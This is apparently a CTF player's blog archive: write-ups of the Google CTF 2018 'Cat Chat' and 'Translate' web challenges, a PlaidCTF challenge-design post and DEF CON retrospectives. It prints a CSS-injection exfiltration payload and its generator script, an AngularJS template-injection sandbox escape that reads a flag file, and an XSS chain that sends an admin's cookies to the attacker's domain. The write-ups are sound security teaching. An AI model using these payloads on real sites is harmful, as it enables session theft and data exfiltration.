In contrast, some of the changes made our job a little less fun. For my part especially, the omittance of packet captures removed a significant strategic element from the game. We use the network captures for a number of different things. One use is as an indicator of how we are being attacked. By seeing what transpires over the wire, we can determine bugs in our application, and figure out how to fix them and use them against other people. The organizers referred to this as "ripping exploits off the wire," but I think that this is a little unfair, because it requires one to understand the contents of the transaction and build off of what other teams already have. It is also worth saying that as a result of removing this, the OOO exposed an api that directly told you if you were being attacked. This helped fill in the gap somewhat, but still left out a lot of information.

Similarly, the knowledge that other teams will have the full contents of what you send them in the traditional attack-defense format encourages teams to be clever about how they deploy their exploits. It no longer becomes a matter of find-exploit-pwn, but instead other questions come into play such as: "who do we exploit?", "which exploit do we use?", and "how can we hide our exploit?". The importance of these "metagame" elements are one of the most interesting aspects of attack-defense style CTFs. Without these, the contest becomes more similar to a standard Jeopardy competition, and loses some of the "real-world" feel.

Finally, the loss of consensus evaluation removed another fun, inter-team component to the game. Instead of having an exploit that either works or does not work, consensus evaluation gives teams a way to seek out errors in the patching process, and exploit those for points. Not to mention, everybody loves to show off their fancy backdoor!

These are, of course, the thoughts of an individual player on an individual team. I would be interested to hear from both other teams and organizers as to their opinions on the new decisions.

A Challenge Coin for your Thoughts

Although it was disappointing to not win this year, losses like these always provide rich insight into ways that we as individuals and as a team can improve.

Avoid Mental Lock-In

I personally fell into the trap of preparing for defense and defense alone. When we arrived and found out that nearly all of our defensive systems were made irrelevant, I never mentally recovered. Instead of responding to that with "ok, let me spend most of my time on XYZ instead," I began bouncing around other projects and problems working on them in short vignettes. This is not to say that I was totally useless, but had I been more focused in what I was working on, I could have contributed more to the team. That would have been possible had I prepared to work on aspects of the competition beyond just defense.

Organization is Always Useful

This may not be true for everyone, but oftentimes I think of organization as a luxury only for when I have a lot of time on my hands. In practice, this is a terrible mindset to be in, and there were a number of places where better organization could have helped us a lot. A prime example of this is that in working on two different problems, a team member found a critical bug but did not realize it. They made a mental note to come back to it, but it eventually slipped their mind and the bug was never investigated later. Having a good way to organize these thoughts and notes could have helped us significantly.

With that said, there were a number of places were we organized ourselves well. Our team captain did an excellent job of making sure that everyone was involved in some aspect of the competition, and that everyone had goals to work toward. This meant that we had to waste far fewer cycles coordinating among ourselves and syncing up with different teams.

You Cannot Predict the Future

Having spent so many hours preparing a useless tool for finals this year, I was quick to beat myself up over our loss. In some sense, it felt as though my own shortcoming in predicting what we would need cost us the game. Yet, when I revisit what I knew ahead of time, I realize that knowing what I did then, I still made the best decision I could. It was unfortunate, but I came to Vegas and lost the gamble. As long as I take the time to discuss what went wrong and what we can do better next time, it was all still worth it.

T-364 Days

While this may not be as exciting as a write-up from the winning team, I think that it is nonetheless valuable to see the competition from a slightly different perspective. I want to once again thank the Order of the Overflow for all of the hard work and sleepless nights they suffered through to bring us this competition. Furthermore, DEFKOR00T, HITCON, and all of the other teams played an awesome game and really pushed us. Congratulations again to DEFKOR00T, and I'm looking forward to seeing everyone in Vegas again next year!

Zach Wade is a student of computer science at Carnegie Mellon University. He is also a member of the PPP, CMU's competitive hacking team. You can find him at @zwad3
Google CTF 2018: /bin/cat chat
Jun 29 2018

Google CTF has come to a close, and with a very narrow victory on our part. As we decompress and mull over a set of excellent problems, we will post a few writeups of the ones we solved. Here is a writeup for the web problem "Cat Chat."

Cataloguing the Challenge

Who doesn't love chatting about dogs! Apparently, the folks at Google CTF. In fact, they dislike it so much that they made a chat application where you can talk about literally anything else. They called it Cat Chat and it has a bit more depth than we might think.

Our first introduction to the problem is pretty simple. We're offered a full-window chat interface that introduces itself as Cat Chat. In addition, it lays out a few basic "rules" for using it. They are:

  • We can invite other members by sharing the URL
  • We cannot talk about dogs
  • We can change our name using the /name command
  • We can report others for talking about dogs

Finally, and most critically, the introduction also provides a link to the server code. This, plus the client's catchat.js will give us all that we need to break free of this dog-lovers' dystopia.

Categorisations

Before we start looking for bugs and exploits, let's break down what both the server and the client do. At 77 lines, the client code is incredibly easy to read through. Essentially, it opens a long running Server-Side Events (SSE) connection and uses that to get information about the chat. When a message is sent, it gets pushed along the event pipe (unless the message is a report, in which case a captcha is first invoked). In addition, the pipe can spit out a number of events that update the client in different ways. These are:

  • undefined: Does nothing
  • error: Logs an error and complains in the chat
  • name: Informs the chat of another member's name change
  • rename: Updates your name in the localStorage.
  • secret: Overwrites your current secert, then displays the new one hidden with CSS.
  • msg: Under normal circumstances, displays to the chat a message that has been received. However this will also autosend "Hi" when you first connect.
  • ban: The most amusing event. When a client sees ban it compares its name in localStorage against the name of the person who was banned. If they are the same, then it gives itself a "banned" cookie and disconnects from the chat.

In addition to the events, there is also a function called cleanupRoomFullOfBadPeople. This has no entrypoint, so it can reasonably be considered an admin-only function. Indeed, its primary purpose is to periodically check whether anyone has used the word "dog", banning them if they have by fetching their username out of the post's HTML. Like the rest of the client code, conveniently, it is nice and simple. Now let us look at the server.

Surprisingly enough, the server is not substantially more complicated than the client. A large amount of its code is dedicated to managing the multiple connections and setting up the various SSE pipes. Although we spent a while looking at these parts of the code, there was nothing very interesting about them so we will ignore them from now on. The interesting pieces are in the CSP — which gets set for every room — and the message processing logic.

The CSP is suitably locked down, with the following permissions

default-src 'self'
style-src   'unsafe-inline' 'self'
script-src  'self' https://www.google.com/recaptcha/ https://www.gstatic.com/recaptcha/
frame-src   'self' https://www.google.com/recaptcha/

Nothing exceptionally interesting, although the locked-down script-src, in combination with no ability to upload files, suggests that our eventual exploit will likely not be JS based. Furthermore, the freedom of unsafe-inline for style-src implies that we will be using some variant of CSS injection.

Looking now at the message handling logic, we see that it first checks that the request is originating from the correct site. Otherwise, it will return a CSRF error. Then, if no command is being executed, it will send a broadcast message from the user to all other members of the chat. Finally, if the message starts with a slash followed by text, then we case on the text. The cases we support are:

  • /name: In which case we send that person a rename response, and broadcast a name event to everyone else.
  • /ban: In which case we first check for an admin, and then send a ban event to all members of the chat.
  • /secret: In which case we set the user's secret cookie and then send them a secret response.
  • /report: In which case we forward the information to a hidden admin.report command.

While each of these is interesting, nothing is obviously wrong with the server.

Catching Bugs

Now that we know approximately how the problem works, let's make a few observations. First, the admin is just a normal user that happens to have a special cookie set. Secondly, we almost certainly need to find a way to leak the admin's flag using CSS. Finally, we can probably ban the admin.

This last observation is not strictly relevant to the problem, but how could we resist the opportunity to ban them? Fortunately, it should be easy enough. Since all users see the /ban response, if we set our own name to admin they will ban us with themselves alongside. Let's try!

Wait, what went wrong? Not only was the admin not banned, but neither were we! Well, remember how we described the ban check earlier? It looks at the html for the post and fetches the user's name out of it. Then, it bans that user. Unfortunately, when two users have the same name all posts from either user are labeled as <shared_name> (you). Thus, when the admin went to ban me for talking about dogs, they instead tried to ban the user admin (you).

So now we're stuck. Forget about the CTF, we have to ban the admin! It's an affront to our very being that they remain unbannable. We should look more at the code.

Interestingly enough, when the server is parsing a command, it initially fetches the name of the command by using the regular expression /^\/[^ ]*/. This regex will match a slash followed by any number of characters that are not space. However, once it parses the command, it finds the argument for it by using a different regular expression (as in the case of ban): /\/ban (.+)/. This RegExp will only match a command followed by a non-zero number of characters, but it can be anywhere in the string.

This discrepancy is notable because the admin is banning us using the simple templated string: /ban ${name}. Since . does not match newlines, this means that if we start our name with a newline, we can embed another /ban command later in the expression. Our mean admin thought they could avoid us, but now we have a new trick. If we set our name to be "\n/ban admin", when they tries to ban us, they'll ban themselves instead!

No! We thought we had them. What happened this time? It turns out that when the admin queries our username, they do so with the function element.innerText. Notice how our username rendered itself all on one line? This means that when the admin tries to get our name, the newline will be stripped and they will see our name as /ban admin. There is still hope, however. Since innerText returns the rendered form of the underlying HTML, perhaps if we can get the HTML to render the newline, then the ban will go through.

There may be multiple ways of going about this, but the first one that I can think of is to set the element to have the CSS property white-space: pre. Effectively, what this does is force the HTML to render all of the white space in the text. We can try this out locally and see that doing so indeed causes innerText to return our username with the newline included. Now all we need is a way to render arbitrary CSS on the admin's page.

Looking at the client code again, we find that after a ban, the client renders that user's name in red. It does so by making a CSS query using the attribute selector with our escaped name embedded

`<style>span[data-name^=${esc(data.name)}] { color: red; }</style>`

Fortunately for us, that esc function is incredibly weak. The only characters it replaces are < > " and '. As it turns out, none of those are needed to write valid CSS!

Finally, we have a real path to victory. If we set our name to be \n]{}\n #conversation span:first-child { white-space: pre }\n/ban admin, then the first time we get "banned", the admin will inject the following CSS into their active styles (reformatted):

span[data-name^=
] { }

#conversation span:first-child {
    white-space: pre
}

/ban admin

Despite the terrible syntax errors, CSS is incredibly forgiving and will still render all relevant spans as pre (note that we could use a simpler selector here, but then the result would be impossible to read). Now, if we get "banned" again, the admin will ban our username with the newlines embedded and end up banning themselves instead. Let's go get them!

Bask in that glorious ban! It feels so wonderful for the admin to finally get a taste of their own medicine. I hope you enjoyed this writeup, and I'd like to thank my team, my friends, and all of the...

Wait, what do you mean we still need to get the flag? Oh, huh. I suppose we do. Fortunately, our boondoggle has led us most of the way there.

Cater to the Masses

In order to get the flag, all we need to do is convince the admin to place their secret in the DOM, and then we can use our CSS injection to exfiltrate it.

Diving in, the first thing we need to do is get the admin to dump their secret onto the page. Realistically, a readthrough of the server code indicates that the only way to do this is to have them run the secret command. However, the only command we can force them to run is the /ban command. Fortunately for us, their server makes a classical blunder. Let's look at the command logic:

switch (msg.match(/^\/[^ ]*/)[0]) {
  case '/name':
    if (!(arg = msg.match(/\/name (.+)/))) break;
    response = {type: 'rename', name: arg[1]};
    broadcast(room, {type: 'name', name: arg[1], old: name});
  case '/ban':
    if (!(arg = msg.match(/\/ban (.+)/))) break;
    if (!req.admin) break;
    broadcast(room, {type: 'ban', name: arg[1]});
  case '/secret':
    if (!(arg = msg.match(/\/secret (.+)/))) break;
    res.setHeader('Set-Cookie', 'flag=' + arg[1] + '; Path=/; Max-Age=31536000');
    response = {type: 'secret'};
  case '/report':
    if (!(arg = msg.match(/\/report (.+)/))) break;
    var ip = req.headers['x-forwarded-for'];
    ip = ip ? ip.split(',')[0] : req.connection.remoteAddress;
    response = await admin.report(arg[1], ip, `https://${req.headers.host}/room/${room}/`);
}

Look at that! They use a switch statement with no breaks after the cases. This means, that we can use the same technique from the previous exercise to have them ban someone and then fall through and call /secret.

While we can be reasonably assured that this works, we're left with an issue. As soon as we call secret, we overwrite their flag cookie with one of our control. This seems problematic at first, but a quick glance at the Set-Cookie grammar of RFC6265 reminds us that cookies can be defined for arbitrary domains. Thus, we can set our flag cookie to be bogus; Domain=google.com and so we won't overwrite the admin's cookie. Instead, they will put their original cookie in the dom.

Finally, all that we need to do is exfiltrate it. There was something odd in the server code that I neglected to mention earlier, namely that the endpoint used for sending messages is method agnostic. You can POST to it, or GET it, or maybe even DELETE it. Regardless, the ability to send messages via a GET request gives us everything else that we need.

For those not versed in classic CSS exfil, the traditional technique is to use a background image url that only triggers on certain queries. By checking whether the query landed, we can get a single bit of data from the target. Exempla gratia, we can embed the following CSS query into our payload to know whether the admin's flag has an 'A' in it.

[data-secret*=A] { 
    background: url(https://cat-chat.web.ctfcompetition.com/room/<OUR_UID>/send?name=exfil&msg=A) 
}

This uses the attribute selector in CSS to test whether the current page has any element whose attribute data-secret contains an A. If it does, it makes a request that will print the message A from the user exfil.

To test our whole exploit thus far, we can check to see if the admin's flag contains the letter C. Since we expect it to start with CTF{ }, this should succeed. In order for this to work, we will set our name to

 fake_banned_user
/secret hi_google; Domain=google.com
end_injection_tag] { }
[data-secret*=C] {
    background: url(https://cat-chat.web.ctfcompetition.com/room/fb587ec9-6bff-4c4a-913b-852cfdb8effb/send?name=exfil&msg=C)
}
[begin_injection_tag

Trying this out, we get

Just as we expected, we get 'C' back from our exfiltrator.

Catastrophe

Now that we have a proof of concept working, this is the part where I would show you my exploit script for you to look at and admire. Unfortunately, I cannot as I don't have one. Instead what I have is a short name generator that we used while doing all of the exfiltration by hand.

There are a number of reasons why we ended up doing this, but the biggest one is that since we can't embed quotes into our CSS, we are severely limited by the characters we can use. Furthermore, even if it matched multiple rules, you may only have a single background image and so it would only exfiltrate one character per attempt. As such, our approach was to write a small shim that we could update as we went and then leak one character at a time going either forward or back from what we had. This was further complicated by the fact that we were not able to use { and we could not start any of our guesses with numerals. As such, this took about 15 queries before we were able to piece together the whole flag.

For reference, here is the shim

prefix   = "L0LC47S_43V3"
suffix   = ""
alphabet = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
numerals = "0123456789"
strings  = ""
strings  += alphabet + numerals

chrs = (strings)
    .split("")
    .map((letter) => 
        ` [data-secret*=${prefix}${letter}${suffix}]{ background: url(https://cat-chat.web.ctfcompetition.com/room/fb587ec9-6bff-4c4a-913b-852cfdb8effb/send?name=exfil&msg=${prefix}${letter}${suffix}) } `).join("\n")

localStorage.name = ` fake_banned_user
/secret hi_google; Domain=google.com
end_injection_tag] { }
${chrs}
[begin_injection_tag`

Trying it out on the final letter of the flag, we can see how it works:

Finally, we have our flag and no longer have to listen to the admin's hateful messages. Now go forth and always remember our good dog when you pwn.

Google CTF 2018: Injection Modèle
Jun 29 2018

Google CTF has come to a close, and with a very narrow victory on our part. As we decompress and mull over a set of excellent problems, we will post a few writeups of the ones we solved. Here is a writeup for the web problem "Translate."

An Odd Sort of Translation

Upon visiting http://translate.ctfcompetition.com:1337/, the homepage of the Translate service, we are greeted with a service that claims to be a "Translation utility for technical terms in French and English." Although the front page is rather bare-bones, it immediately offers a way for us to engage with it, in the form of an input field. "What French word," it invites, "do you want to translate into English?" Although it might be tempting to make our first query " or 1=1; -- , or perhaps "><script>alert(1)</script><, a better use of our time might simply be to ask for one of the suggested prompts.

Submitting téléverser to the form causes it to disappear and be replaced with a helpful translation of the form "In french, téléverser is spelled upload." While I have some suspicions about the grammatical accuracy of that statement, it is helpful to see how the service acts when its working. Now that we know that, its time to poke at our target.

Poke and Prod

First, let's look at the capabilities of this site. As listed in the menu bar at the bottom, we may

  • Translate from French to English
  • Translate from English to French
  • Add words to our dictionary
  • Debug our translations
  • Reset the problem

Thus, we don't have much to start with, although we now have a few places to look.

In the problem description, we're given the hint "Client-side rendering, but not in a browser." Although you might have your suspicions going in, a quick glance at the clients code confirms them. The total number of source lines (including scripts and styles) is only 31. That, in combination with tags of the form <div ng-if="!userQuery"> ==suggest that this problem involves server-side AngularJS rendering.==

Now, any time you have a templating engine of any form running server-side, the first thing to look for is always a template injection. Whether its liquid templates, handlebars, or now Angular, these set-ups are often pointing in the same direction. Sure enough, upon clicking the "debug translations" link, we come across two suspicious looking "dictionaries". While each of these maps do act as a literal dictionary, they also have keys that appear to be part of the UI. In fact each of them has the same (modulo language), key value pair:

{ "in_lang_query_is_spelled":"In french, {{userQuery}} is spelled ." }

If this sounds familiar, that's because this is the prefix we saw when we queried téléverser earlier. It seems that this is being used as a template for our requests. Indeed, for those familiar with Angular's templating engine, the substring "{{userQuery}}" is an example of its embeded markup. Specifically, at run time that string will be replaced by a scoped variable called userQuery. Thus, we have found evidence of templating.

While this is a step in the right direction, it is far from sufficient. All that we have so far is a static string and no injection point ourselves. Recall, now, the options we found initially. Since one of the options was to add new words to our dictionary, and this template string seems to, oddly enough, be in our dictionary, perhaps it is possible that we can overwrite their template string with one of our own.

Malicious Assistance

Now that we have an idea of how the site works, let's try adding our own words to the dictionary. However, instead of helpfully adding translations, we are going to say that the "Original Word" in_lang_query_is_spelled is translated as "I can do math: 1 + 1 = {{1+1}}". If our suspicions are correct, we upon querying téléverser again we should see a different response.

Sure enough, if we query again, we see the exciting output: "I can do math: 1 + 1 = 2". With this, we have template injections. At this point, we should be basically done.

Cold Hard Truth

In reality, a good CTF problem is never going to be that simple. Now that we have a template, we need to figure out exactly what we can do with it. This first thing that I tried was attempting to inspect the process. This is a variable in all Node applications that contains information about the execution process and a few methods for interacting with the outside world. However, initial attempts at doing this proved fruitless. Using {{ process }} as the query string returns nothing, and no obvious scopes were available that could access it (i.e. {{ angular.process }} or the like). Even more perplexing, logging {{ this }} gave us the single element $SCOPE, but logging that likewise returned the empty string. Finally, attempting to write statements instead of expressions gave ugly errors. Fo instance, using the query string {{ x = 1; for (i = 0; i < 10; i++) { x += i } }} caused an exception whose body had the word "Error" in it a whopping 5 times! At this point, it seems that we need to break out of our current context.

While I do not know much about Angular's templating language, it seems to be a parser that matches a subset of valid JavaScript and then evaluates it in an isolated context. In order to do anything useful, we need to be able to escape this limited scope. Through trial and error we see that it allows strings and expressions, so if we can get an eval call into the template, then we might have a fighting chance. Unfortunately (once again), attempting to find one through either {{ eval }} or {{ Function }} return nothing but the empty string.

Hopefully at this point, you have an inkling of what's coming next. Think once again about what we just established — it allows strings and expressions. If this is true, then we should be able to access the string constructor through {{ 'a'.constructor }}, and then the string constructor's constructor (i.e. the function constructor) through {{ 'a'.constructor.constructor }}. Fingers crossed, we submit this and see that instead of the empty string, we're presented with a glorious function Function() { [native code] }; a reference to the Function constructor which is eval in everything but name.

Don't be Eval

Now that we have our eval, we can try again. Indeed, running {{ 'a'.constructor.constructor('return process') }} yields us

{
  "argv": [
    
  ],
  "title": "node",
  "version": "v8.11.3",
  "versions": {
    "http_parser": "2.8.0",
    ...
    "tz": "2017c"
  },
  "arch": "x64",
  "platform": "linux",
  "env": {
    
  },
  "pid": 174,
  "features": {
    "debug": false,
    ...
    "tls": true
  }
}

This means that we've successfully escaped our scope and have access to the underlying node VM.

Yet, our victory is short-lived. We notice quickly that we still do not have access to some of the things we would like, such as require or the angular object. Furthermore, the this object appears to only have the above process and an empty object called console. To figure out why this is, we can construct a more powerful query

'a'.constructor.constructor("let o = ''; for (x in this) o+=x+' '; return o")()

This prints out all of the keys in this, even the ones that JSON-ification leaves out. Much to our dismay, we see the following list: x VMError Buffer setTimeout setInterval setImmediate clearTimeout clearInterval clearImmediate process console. This list is small, certainly, but what is most discouraging is the presence of VMError. For those who are unfamiliar with it, this is an exception added by the vm2, a tightly locked sandbox for running untrusted JS. Although I spent a while looking, I could not find any recent bugs in it.

Something Seems Off

At this point, we're still stymied. We have arbitrary JS access, but within a sandbox. Although we know we just need to read flag.txt from a file, we have no way of doing it. Clearly, we are still missing something and a brief reflection causes us to realize that when we logged {{ this }} earlier, we saw a reference to $SCOPE that was not present on the this we logged more recently. This indicates that there might be more properties available on the outside this that we can use. To find out what these are, we can augment the script from above by passing in an argument:

'a'.constructor.constructor("args", "let o = ''; for (x in args) o+=x+' '; return o")(this)

Using this, we can see all of the keys on the parent scope. Much to our joy, this this is the good this, with the properties: $$childTail $$childHead $$nextSibling $$watchers $$listeners $$listenerCount $$watchersCount $id $$ChildScope $parent $$prevSibling $$transcluded window i18n userQuery $$phase $root $$destroyed $$isolateBindings $$asyncQueue $$postDigestQueue $$applyAsyncQueue constructor $new $watch $watchGroup $watchCollection $digest $destroy $eval $evalAsync $$postDigest $apply $applyAsync $on $emit $broadcast.

Although I would love to talk about each and every one of these in an organized manner, at this point I've surely bored you to tears, and frankly I don't know about any of them. Upon seeing the reference to i18n, I used the above trick to enumerate all of its properties. Unlike its parent, all that resided on it were template and word. While there are approaches you can take to figure out more about what a black-box function does, we can opt for the simple one and try executing it on an input string.

For my part, that's exactly what I did, executing the template {{ i18n.template("foo") }}. In what was a huge surprise to me, as it may be for you, I was presented with the lovely error message: Couldn't load template: Error: ENOENT: no such file or directory, open './foo'. This means that it attempted to open foo, but wasn't able to because it didn't exist. However, we want to read flag.txt which surely does.

With a tremor in our hand and a flutter in our hearts, we upload the template {{ i18n.template("flag.txt") }}. Lo-and-behold, out pops the string: CTF{Televersez_vos_exploits_dans_mon_nuagiciel}.

No source was needed, not even a sandbox could stop us. Congratulations, you hacked Google Translate!

PlaidCTF 2018: I Heard You Like XSS
May 11 2018

In preparation for PlaidCTF 2018 I designed a two part web challenge called S-Exploitation (Paren Trap and the Wizard of OSS). Although I intended the first part to be an easier web challenge, and the second to be a tricky follow up, the former had only 16 solves and the latter just 2. Since I had a number of people ask me for clarification after the CTF, and to help other organizers to learn from it, I've described below how S-exploitation was designed and meant to be solved.

For those who don't care about the implementation, you can skip straight ahead to the solution.

Inspiration

A couple of months back I stumbled across this blog post. It's definitely worth a read, but the short version is that they were able to perform a privelege escalation in CouchDB because two parsers handled duplicate keys differently when decoding JSON strings. One parser (which implemented the spec correctly), could be used for authentication, and the other for privileges. Initially I had planned to make this problem a short recapitulation of that bug. Unfortunately for me (and fortunately for the rest of the world), every reasonable JSON parser I could find for node implemented the spec properly. In a few cases, they had options to deviate from it, but that would have been too obvious to make for an interesting problem.

I considered briefly using the exact stack mentioned in that bug, but then had the idea to implement my own JSON parser. For the life of me, however, I could not think of a way to frame it in a way that would seem "reasonable." Instead I had the brilliant idea to use an ==S-expression== parser.

Fortunately for us, the native-sexp.node file is in /app. However there is a catch. The blog serves the file as Latin1 because this is the only binary-preserving encoding that can also be used by express for rendering text. However, this causes some problems when it gets served over the wire, as it will be served as utf-8. If you try and open up the resulting binary naively, you will get a whole lotta corruption. Fortunately, a simple script can restore it to its original state. An example decoder might be

let string = "...";
let decodedString = Buffer.from(string, "utf-8").toString("latin1");

Once you've decoded it, you can now open it up in your favorite disassembler, since it's just a fancy ELF.

As for reversing the binary, I won't go into much detail on this. It's relatively straightforward, and since I didn't remove symbols you don't have to work too hard. Once you poke around for a little bit, you notice that strings which are prefixed with @ will be eval'd. There's another catch, though. Most of the useful characters such as [,],(,),... are all disabled. It looks like all it can do is resolve numeric types and variables from the global scope.

Let's take a step back and remind ourselves of what we want to do. Since our end goal is performing an XSS on the sexp-updator... domain, we need to inject JavaScript somewhere on the page. Yet, the only places where JavaScript is allowed at all are on the home page (for ractive templating), and on the welcome page (for a JS redirect). Since we have no control over the home page, that means we need to inject into welcome. Fortunately for us, it inserts our name directly onto the page. Unfortunately for us, it can only run if it's using the appropriate nonce. Since the nonce is randomly generated, and it adds entropy on every page access, this seems impossible.

At this point, its worth noting how the randomness works. Specifically, it's using a package called seedrandom that not only lets you dump entropy into the pool, but as the name suggests, also let's you seed the random state. Moreover, it positions itself in the global scope, so Math.seedrandom is available from our S-Expression parser. This still seems problematic, since we have no parenthesis and can thus not call functions. Except, that's not quite true. JavaScript technically has two methods of calling functions. The most practical of these is functionName(arg1, arg2,...). The other, with the addition of template string literals, is to tag a template string as such functionName`stringArg`. This only allows you to pass a single argument as a string array. While this isn't a tremendous amount of power, it does give us enough to call Math.seedrandom with an argument. With this, we can now predict the nonce after a login.

However, we are not done yet. Even with all of this, we still have no way of forcing the admin to log in using this malicious account. In order to do this, we need another XSS as a launchpad. Looking over at SaMOA for a moment, we notice that on the /auth endpoint the user field is inserted into that page as HTML. This isn't sufficient, unfortunately. Simply injecting a script tag in here will not cause it to be executed. However, we notice that our content security policy contains strict-dynamic, so if we can convince ractive (the templating engine used by SaMOA) to insert our script into the page, it will be run.

It turns out this is pretty easy. See those flashing flags at the bottom of the page? Well, a quick glance at how that works shows that its requesting the template "firstFlag". Looking at ractive's source, we see that it does this by doing a getElementById call and then ensuring that the element is a <script>. Well this is easy enough, we'll just set our user to be

<script id="firstFlag">
  <script>
    alert("PWN");
  </script>
</script>

We're closer now, but still not able to pull off this crazy exploit. Remember how we can only send Upd8t0r domains to the XSS bot? Well our initial XSS is on SaMOA. However, the /samoa endpoint takes arguments specifying which itms to request. Look at how it does this

let opts;
if (req.query.opts && Array.isArray(req.query.opts)) {
    opts = req.query.opts;
} else {
    opts = ["color", "food"];
}
optString = (opts.map(s => `${s}=true`)).join("&");
res.redirect(`http://${samoa}/auth?redirect=http://${updator}/login&user=Upd8t0r&${optString}`)

Since it naively joins the requested permissions together, if we set opts[] to be user%3d<exploit>%26f, we can have our redirect set the user parameter.

With this complete, we have everything we need for our exploit chain.

The Exploit (Part 2)

An actual exploit script (guide?) can be found (here)[/upload/fee231f6-exploit2.py]. For convenience, we'll also step through the process.

The first thing you need to do is to figure out your seed and nonce. In my case, I used the seed "zach" which generated the nonce: "P179M2ydafV7eDiqkc1fvAQfjmCBavE73SYO0Kn0UTjvw2T8lcaKNGAlX5HZZeWkjtxwWf7Z25ZRuZnTKkSjvg==". Once you have that, you need to get a signed token that includes our eval payload. The payload should look like

@"Math.seedrandom`zach`" @"foo"

Note that it's crucial to create a well-formed S-Expression so that the parser gets to the eval phase. However, you also need to have it throw an error so that the admin does not overwrite his cookie. This is what the reference to foo is for.

Now that we have our signed token, we can create our inner XSS. You can look at the exploit script for details, but mine is just a dumb redirect to a domain I control with the cookies as a query parameter. Make sure that the script tag this is enclosed in has our predicted nonce. Otherwise, Chrome will not run it. Since we need this to be injected, register an account on SaMOA using this as the username. You must also create an account on Upd8t0r by hitting the /samoa endpoint once.

We're now very close. All that remains is to write our outer XSS, which will be wrapped in the ractive impersonation tag. This script first needs to hit the /login endpoint of Upd8t0r using the malicious token we created earlier. Then, it needs to have the client POST to /login with the password you set. It's probably easier to perform this POST as a redirect by creating a form on the page and submitting it. Then, when Chrome renders the welcome screen, your exploit will execute, giving you the admin's cookies.

And that's it, you've gotten the flag!

Issues and Lessons Learned

As I mentioned earlier, this problem ended up being significantly harder than I intended. I knew it would be tricky, but I had anticipated solve counts around 40/5 instead of 16/2. So what went wrong?

Well the cop-out answer is that because Plaid was only 36 hours this year, teams didn't have enough time. Whil this is true, it masks some deeper issues that I could have prevented. Firstly, the source leak at the beginning was a little bit too guessy. I thought it was obvious, and testers found it quickly as well, but I think people are used to seeing LFI as the result of query params, and were confused by this related, but more disguised endpoint.

Beyond that, I think the encoding issue with the LFI was especially problematic. Everyone assumed that it was just a corrupted binary, not realizing that the translation from latin1 to utf-8 was the issue. It might have been a little contrived, but I think casing on whether it was a binary or not and then changing the mime type to something more appropriate would have helped teams along.

Finally, I think this was just too complicated. As for this, I'm divided. On the one hand, I think that this exploit chain was one of the most fun I've ever performed. At the same time, seeing first hand the frustration of all those on IRC confused by the different pieces, I'm not sure that it was appropriate for a CTF. For organizers, I'll leave this decision up to you, and for players, I'll try to be more considerate next time (perhaps with more intermediate flags).

It's also worth noting that at least one of the two teams who solved this problem did not use this exact exploit. They instead noted that although you can't run JS on the post pages, you can embed a meta redirect tag to transfer the bot over to a domain you control. While it's always annoying as a problem developer to see bypasses to your problem, in this case they only bypassed the XSS on SaMOA, and in a very clever way.

Thanks

Thanks to all who played, and congratulations to TeaDeliverers and GermanysNextRopModel for solving part two. Please feel free to complain or offer suggestions to @zwad3. Thanks!

GADTs: Wizardry for a Typesafe Age
Feb 05 2018

Generalized algebraic data types (or GADTs) are a powerful tool that can augment algebraic type systems enabling them to be far more expressive. In addition to enabling polymorphic recursion, they also serve as a fundamental unit for existential types. In this post we will look at what all of those phrases mean, and how GADTs can be used in practice.

^

Background

While it's easy to think there is only one correct way to write code, in the practice the conflict between typed and ==untyped languages== is yet undecided.

To Depart from Clemency: A DEF CON 2017 Retrospective
Aug 01 2017

Another year, another DEF CON. This year, from the far reaches of LegitBS’s wild imagination came an architecture so bizarre and so confusing that it was actually pretty good. Over the course of three days, we were introduced to cLEMENCy, an intriguing RISC architecture that sported 9-bit bytes, middle endianness, and reversible stacks. It took many sleepless nights, but once again the were able to tool and exploit our way to a tight victory. As a member of the Plaid Parliament of Pwning, here is an overview of the year’s biggest CTF from my perspective.

Initial Trepidation

In August 2016, following the presentation of the DEF CON CTF 2016 results, the Legitimate Business Syndicate (often called LegitBS or LBS) announced that for their final year as the hosts of DEF CON’s premier competition, they would be debuting a custom architecture that Lightning (creator of the world’s most terrifying CTF pwnables) had been working on for two years prior. The reactions to this news were, as one might imagine, mixed. As someone who first learned assembly programming on an M6800, I was excited about getting to use an architecture more RISC-like than x86. Other members of the PPP were significantly less enthused, fearing that the custom architecture would render all of our existing tools useless, and that we would be unable to prepare at all for the following year’s competition. While these fears were justified to a certain extent, LegitBS still pulled off an incredibly fun and exciting game.

cLEMENCy and the Proliferation of Terrible Acronyms

At 9:00 am on the Thursday of DEF CON 25, the Legitimate Business Syndicate tweeted out a link to the official documentation for cLEMENCy — the LegitBS Middle Endian Computer Architecture. While the wonderful folks at LBS might not understand how acronyms work, they apparently have a great sense of humor. Upon downloading and opening the cLEMENCy manual, we discovered that this architecture not only — as the name suggests — is middle endian, but also makes use of ==2-byte and 3-byte words== composed of 9-bit bytes, which our team and several others lovingly came to refer to as nytes.

Sour Lemons

As I mentioned earlier, I once again found myself working on and supporting our defensive efforts. As in previous years, during the competition we were to receive packet captures of all network traffic entering and exiting our host machine, arriving each round on a three-round delay (that is, arriving every 5 minutes on a 15-minute delay). Since these could get huge — some rounds we recorded over 3,000 distinct conversations — we needed pretty powerful infrastructure to manage them. In advance, we had written a packet capture management framework called Aviary which could handle all of the processing we wanted to perform on the network traffic and present it in an intuitive and friendly interface. This was perhaps the most useful of our defensive tools, because it allowed one or two people to effectively monitor all of our network traffic.

However, once we encountered suspicious network traffic we needed a way to confirm that we were in fact being attacked. To address this problem, I spent most of my time working on CITRUS, the Clemency Interactive Terminal and Real-time Unassembly System.

The basic principle behind CITRUS was to act as a web-based frontend for the cLEMENCy debugger. While the debugger was reasonably powerful (and was more than I had expected LBS to provide us with) it was still a pain to use and couldn’t easily interface with our existing systems. To address this, CITRUS would allow a web-frontend to automatically spawn a debugger instance on an AWS server farm somewhere and then talk to it via websockets. The hope was that CITRUS would make debugging cLEMENCy programs easier while simultaneously allowing us to replay network traffic and examine it for bugs and flags.

